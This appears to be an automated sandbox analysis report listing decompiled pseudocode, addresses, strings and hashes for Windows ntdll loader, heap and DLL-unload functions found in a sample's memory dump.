								__eflags = _t79 & 0x00000003;
								if((_t79 & 0x00000003) != 0) {
									E3290E692("minkernel\\ntdll\\ldrinit.c", 0x660, "_LdrpInitialize", 0, "LDR:MRDATA: Process initialization failed with status 0x%08lx\n", _t149);
									_t79 =  *0x329837c0; // 0x0
								}
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) != 0) {
									asm("int3");
								}
								goto L14;
							}
						} else {
							 *(_t151 - 0x1c) = _t148;
							if( *0x329868d0 != 0) {
								L18:
								 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0x10));
								return _t79;
							} else {
								if( *_t140 != 0) {
									_t148 = 0;
									 *0x32985d50 = 0;
									_t118 = 1;
									_t99 = 2;
									_t133 = 0x32985db0;
									asm("lock cmpxchg [edx], ecx");
									__eflags = _t99 - 2;
									if(_t99 == 2) {
										__eflags =  *_t140;
										if( *_t140 == 0) {
											_t149 =  *(_t151 - 0x1c);
											goto L62;
										} else {
											_t79 = E32911B93();
											_t149 = _t79;
											__eflags = _t149;
											if(__eflags >= 0) {
												L62:
												_t79 = E328C648A(_t133);
											} else {
											}
											goto L11;
										}
										goto L15;
									} else {
										goto L44;
									}
								} else {
									L11:
									if(( *(_t112 + 0xfca) & 0x00000040) == 0) {
										_t166 =  *0x32985a85;
										if( *0x32985a85 != 0) {
											_t140 = 0x329867b4;
											L328953C0(0x329867b4);
											while(1) {
												__eflags =  *0x32985a85;
												if( *0x32985a85 == 0) {
													break;
												}
												L328A21D0(0x329867b8, _t140, 0, 1);
											}
											E328952F0(_t118, _t140);
										}
										_t79 = E328ADA59(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t140, _t149, _t166);
									}
									L14:
									_t141 = 0x2000;
									L15:
									if(_t149 < 0) {
										L67:
										_t120 = _t149;
										L32911D5E(_t149);
										_push(_t149);
										_push(0xffffffff);
										_t79 = L328D2C70();
										__eflags =  *(_t151 - 0x24);
										if( *(_t151 - 0x24) != 0) {
											goto L18;
										} else {
											E328E8AA0(_t120, _t133, _t149);
											asm("int3");
											_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
											__eflags =  *_t84;
											if( *_t84 != 0) {
												_t85 =  *[fs:0x30];
												__eflags =  *(_t85 + 0x240) & 0x00000004;
												if(( *(_t85 + 0x240) & 0x00000004) != 0) {
													_t88 = L328A3C40();
													__eflags = _t88;
													if(_t88 == 0) {
														_t89 = 0x7ffe0385;
													} else {
														_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													}
													__eflags =  *_t89 & 0x00000020;
													if(( *_t89 & 0x00000020) != 0) {
														E32910227(0x1484, _t133 | 0xffffffff, _t133 | 0xffffffff, _t133 | 0xffffffff, 0, 0);
													}
												}
											}
											asm("lock inc dword [0x32985db0]");
											_t86 =  *0x32985d50;
											__eflags = _t86;
											if(_t86 != 0) {
												_push(0);
												_push(_t86);
												return E328D2A70();
											}
											return _t86;
										}
									} else {
										if(( *(_t112 + 0xfca) & _t141) == 0) {
											_t79 = E328D45B0();
										}
										goto L18;
									}
								}
							}
						}
						goto L76;
					}
				}
				L76:
			}

0x328c6326
0x328c6327
0x328c6328
0x328c632a
0x328c632c
0x328c634d
0x328c634d
0x328c632e
0x328c6340
0x328c6356
0x328c6342
0x328c6342
0x328c6344
0x328c6346
0x328c6347
0x328c6357
0x328c6359
0x328c635e
0x328c6363
0x328c6366
0x328c6369
0x328c6370
0x328c6373
0x328c6375
0x328c637d
0x328c637d
0x328c637d
0x328c6384
0x328c6385
0x328c6387
0x328c638e
0x00000000
0x00000000
0x32903fde
0x32903fde
0x32903fe3
0x32903fe5
0x32904031
0x32904031
0x32904038
0x32904038
0x32904038
0x3290403c
0x3290403c
0x32904043
0x00000000
0x00000000
0x3290404c
0x3290404d
0x3290404e
0x32904053
0x32904055
0x32904057
0x3290405d
0x32904060
0x32904079
0x3290407e
0x32904081
0x32904081
0x32904087
0x3290408a
0x3290408c
0x3290408c
0x3290408a
0x32904055
0x00000000
0x32903fe7
0x32903fe7
0x32903fe8
0x32903fe9
0x32903fea
0x32903fef
0x32903ff1
0x32903ff3
0x32903fff
0x32904004
0x32904006
0x3290401f
0x32904024
0x32904027
0x32904027
0x3290402c
0x3290402e
0x32904030
0x32904030
0x00000000
0x32903ff5
0x32903ff5
0x32903ff5
0x32903ff3
0x328c639d
0x328c639d
0x328c63a2
0x32903e99
0x32903e9a
0x32903e9b
0x32903e9c
0x32903ea1
0x32903ea6
0x32903eab
0x32903eb3
0x32903ebd
0x32903ec6
0x32903ec9
0x32903ed3
0x32903ed5
0x32903ed7
0x32903f14
0x32903f18
0x32903f1b
0x32903f1e
0x32903f22
0x32903f28
0x32903f2f
0x32903f2f
0x328c6406
0x328c6411
0x328c6413
0x328c6416
0x328c6418
0x32903f3b
0x32903f40
0x32903f42
0x32903f5b
0x32903f63
0x32903f63
0x32903f68
0x32903f6a
0x32903f6c
0x32903f6c
0x32903f6d
0x00000000
0x328c641e
0x328c641e
0x328c6425
0x32903f79
0x00000000
0x328c642b
0x328c6430
0x328c6436
0x328c6436
0x328c6439
0x328c643c
0x328c6441
0x328c6447
0x328c6449
0x32903f8a
0x32903f8c
0x32903f8c
0x328c644f
0x328c6456
0x328c645b
0x328c6468
0x328c646d
0x328c6473
0x328c6478
0x328c647a
0x00000000
0x328c6480
0x328c6480
0x00000000
0x328c6480
0x328c647a
0x328c6425
0x32903ed9
0x32903ed9
0x32903ede
0x32903ee0
0x32903ef9
0x32903f01
0x32903f01
0x32903f06
0x32903f08
0x32903f0e
0x32903f0e
0x00000000
0x32903f08
0x328c63a8
0x328c63a8
0x328c63b2
0x328c63f6
0x328c63f9
0x328c6405
0x328c63b4
0x328c63b7
0x32903fbc
0x32903fbe
0x32903fc6
0x32903fc9
0x32903fca
0x32903fcf
0x32903fd3
0x32903fd6
0x32904091
0x32904093
0x329040a5
0x00000000
0x32904095
0x32904095
0x3290409a
0x3290409c
0x3290409e
0x329040a8
0x329040a8
0x00000000
0x329040a0
0x00000000
0x3290409e
0x00000000
0x32903fdc
0x00000000
0x32903fdc
0x328c63bd
0x328c63bd
0x328c63c4
0x328c63c6
0x328c63cd
0x329040b2
0x329040b8
0x329040bd
0x329040bd
0x329040c4
0x00000000
0x00000000
0x329040d0
0x329040d0
0x329040d8
0x329040d8
0x328c63d6
0x328c63d6
0x328c63db
0x328c63db
0x328c63e0
0x328c63e2
0x329040e2
0x329040e2
0x329040e4
0x329040e9
0x329040ea
0x329040ec
0x329040f1
0x329040f5
0x00000000
0x329040fb
0x329040fc
0x32904101
0x3290410b
0x328c649c
0x328c649f
0x32904115
0x3290411b
0x32904122
0x32904128
0x3290412d
0x3290412f
0x32904141
0x32904131
0x3290413a
0x3290413a
0x32904146
0x32904149
0x3290415d
0x3290415d
0x32904149
0x32904122
0x328c64a5
0x328c64ac
0x328c64b1
0x328c64b3
0x328c64b5
0x328c64b7
0x00000000
0x328c64b8
0x328c64bd
0x328c64bd
0x328c63e8
0x328c63ef
0x328c63f1
0x328c63f1
0x00000000
0x328c63ef
0x328c63e2
0x328c63b7
0x328c63b2
0x00000000
0x328c63a2
0x328c637d
0x00000000

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 32904009
_LdrpInitialize, xrefs: 32903EEA, 32903F4C, 32904010, 3290406A
Delaying execution failed with status 0x%08lx, xrefs: 32904063
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 32903EE3
Process initialization failed with status 0x%08lx, xrefs: 32903F45
minkernel\ntdll\ldrinit.c, xrefs: 32903EF4, 32903F56, 3290401A, 32904074

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 5df4c2ac32f0000160c9ecdac44108c132f7af00411ef42692367f484018e272
Instruction ID: 5b804fce21af6c8266a4cc23cc31af16bf654d455e449f84b239cf21d0fd52d4
Opcode Fuzzy Hash: 5df4c2ac32f0000160c9ecdac44108c132f7af00411ef42692367f484018e272
Instruction Fuzzy Hash: 9D912578A0632CDFF714CF28CC44BAAB7A4AF85754F088179E9147B281DBB49842CF95

Uniqueness

Uniqueness Score: -1.00%

Function 328A0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E328A0680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E328A0ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x32986960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E3288B910();
						} else {
							E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E3288B910();
						__eflags =  *0x32985da8;
						if(__eflags == 0) {
							L3294FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x32986d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x329891e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push("true");
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E328D2BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							L32955FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x3298373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E328D2B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E3294EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E3294D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t278 = _t298 + 8;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									L32955FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E328A096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												L32955FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = L328A3C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E3294F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = L328A3C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E3294F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E328A036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										L32955FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								L32955FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x3298432c; // 0x0
						_v24 = 0x3298432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x328a0689
0x328a068d
0x328a0690
0x328a0699
0x328a06a3
0x328a0929
0x00000000
0x328a0929
0x328a06b0
0x328f4e97
0x328f4e99
0x328f4e9f
0x328f4ea5
0x328f4ea9
0x328f4eca
0x328f4ecf
0x328f4eab
0x328f4ec0
0x328f4ec5
0x328f4ed7
0x328f4edc
0x328f4ee4
0x328f4eeb
0x328f4ef6
0x328f4ef6
0x328f4eeb
0x328f4e99
0x328a06b6
0x328a06b9
0x328a06b9
0x328a06be
0x328a0921
0x328a06c4
0x328a06c4
0x328a06c4
0x328a06ca
0x328a06d3
0x328a06d9
0x328a06dc
0x328f4f0a
0x328f4f10
0x328f4f13
0x00000000
0x328a06e2
0x328a06e2
0x328a06f2
0x328a0930
0x328a0936
0x328a0938
0x328a093e
0x328a093e
0x328a0938
0x328a06ff
0x328f4f1b
0x328f4f1d
0x328f4f22
0x328f4f29
0x328f4f2a
0x328f4f2c
0x328f4f2d
0x328f4f2f
0x328f4f34
0x328f4f36
0x328f4f39
0x328f4f44
0x328f4f4d
0x328f4f4f
0x328f4f54
0x328f4f5b
0x328f4f5b
0x00000000
0x328f4f5b
0x328f4f3b
0x328f4f3d
0x00000000
0x00000000
0x328f4f3f
0x328f4f42
0x00000000
0x00000000
0x00000000
0x328a0705
0x328a0705
0x328a070c
0x328a070e
0x328a0724
0x328a0727
0x328a072d
0x328a0730
0x328a0751
0x328a0751
0x328a0757
0x328a075c
0x328a075d
0x328a075f
0x328a0760
0x328a0762
0x328a0767
0x328a076a
0x328a076a
0x328a0770
0x328a0772
0x328f4f9f
0x00000000
0x328f4f9f
0x328a077e
0x328a0783
0x328f4faa
0x328f4fad
0x00000000
0x00000000
0x328f4fbc
0x328a078e
0x328a0791
0x328f4fcc
0x328f4fd3
0x328f4fe2
0x328f4fe2
0x328f4fd3
0x328a079b
0x328a07a0
0x328a07a4
0x328a07b0
0x328a07b7
0x328f4fec
0x328f4ff1
0x328f4ff1
0x328a07b7
0x328a07bd
0x328a07c1
0x328a07c5
0x328a07c8
0x328a07cb
0x328a07d0
0x328a07d3
0x328a07d6
0x328f5008
0x328a07e4
0x328a07e4
0x328a07e6
0x328a07e6
0x328a07e9
0x328a07ee
0x328a081b
0x328a081b
0x328a081e
0x328a0827
0x328a082d
0x328a0833
0x328a0839
0x328a083f
0x328a0848
0x328a08fd
0x328a0903
0x328a0903
0x328a084e
0x328a0851
0x328a0855
0x328a0945
0x328a094d
0x328a0950
0x328a0953
0x328a0964
0x00000000
0x328a0964
0x328a0955
0x00000000
0x328a085b
0x328a085b
0x328a086e
0x328a0876
0x328a0879
0x328a0879
0x328a087c
0x328a0880
0x328a0885
0x328a08dd
0x328a08de
0x328a08e1
0x328a08e6
0x328a08f3
0x328a08f8
0x328a08f8
0x328a0887
0x328a0887
0x328a0887
0x328a0889
0x328a0892
0x328a0897
0x328f505d
0x328f5060
0x00000000
0x00000000
0x328f506f
0x328a08a2
0x328a08a5
0x328f5079
0x328f507f
0x328f5086
0x00000000
0x00000000
0x328f5091
0x328f5093
0x328f50a5
0x328f5095
0x328f509e
0x328f509e
0x328f50af
0x328f50be
0x328a08ae
0x328a08b4
0x328a08b9
0x328f50c8
0x328f50cb
0x00000000
0x00000000
0x328f50da
0x328a08c4
0x328a08c7
0x328f50e9
0x328f50eb
0x328f50fd
0x328f50ed
0x328f50f6
0x328f50f6
0x328f5113
0x328f5113
0x00000000
0x328a08cd
0x328a08bf
0x328a08bf
0x00000000
0x328a08bf
0x328a08ab
0x328a08ab
0x00000000
0x328a08ab
0x328a089d
0x328a089d
0x00000000
0x328a089d
0x328a07f0
0x328a07f0
0x328a07f8
0x328f5014
0x328f5017
0x328f501a
0x328f5036
0x328f503d
0x00000000
0x00000000
0x00000000
0x00000000
0x328f501c
0x328f501c
0x328f501c
0x328f501e
0x328f5020
0x328f5023
0x328f5026
0x00000000
0x00000000
0x328f5028
0x328f502b
0x328f502e
0x00000000
0x00000000
0x00000000
0x328f5030
0x328f5035
0x328f5035
0x00000000
0x328f5035
0x328a07fe
0x328a07fe
0x328a0801
0x328a0803
0x328a0808
0x328f5053
0x328a0816
0x328a0816
0x328a0818
0x328a0818
0x00000000
0x328a0808
0x328a07ee
0x328a0789
0x328a0789
0x00000000
0x328a0789
0x328a0732
0x328a0736
0x328f4f63
0x328f4f66
0x328f4f66
0x328f4f6b
0x328f4f6d
0x00000000
0x00000000
0x328f4f76
0x328f4f79
0x328f4f7b
0x328f4f8d
0x328f4f92
0x328f4f92
0x328f4f95
0x00000000
0x328f4f95
0x328a073c
0x328a0742
0x328a074b
0x00000000
0x00000000
0x00000000
0x328a074b
0x328a06ff

Strings

HEAP[%wZ]: , xrefs: 328F4EBB
HEAP: , xrefs: 328F4ECA
(UCRBlock->Size >= *Size), xrefs: 328F4ED7

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: cdd5131c8cffc41f7d41b840226618ae42daf1f13d160645a53863dd339cb5da
Instruction ID: 5fcf6045a5318109c91353bab142775dbfccdfc19c33283968746401109d67ff
Opcode Fuzzy Hash: cdd5131c8cffc41f7d41b840226618ae42daf1f13d160645a53863dd339cb5da
Instruction Fuzzy Hash: 38F1CF78A01705EFE704CF68C8A0F6AB7B5FF84344F1481A9E9199B781DB75E981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 328B9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179
timeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E328B9723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E328BA4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x329865f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x32989214; // 0x0
						_push("true");
						_pop(_t88);
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E3289FED0(0x329832d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x778e36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							L328B0C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x329891e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E328998DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E329185AA(_t87);
							}
						}
						__eflags =  *0x329837c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E3290E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						L328BA390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x329832d8);
					_t50 = E3289E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L328A2330(_t50, 0x32986668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t100 = _t104 + 8;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E328AD963(_t86, _t86, 0, _t104, _t110, __eflags);
								E328A24D0(0x32986668);
								__eflags = _v12;
